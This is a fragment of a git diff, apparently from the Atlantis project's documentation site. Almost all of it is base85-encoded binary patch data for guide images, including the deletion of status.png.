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
Vv-O7ZgykOw(B6Jt_dLVT{tJD_=#&5e

diff --git a/runatlantis.io/guide/images/status.png b/runatlantis.io/guide/images/status.png
deleted file mode 100644
index 88b5b88e65df67422f38b00b9a6d09558291484e..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 45991
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
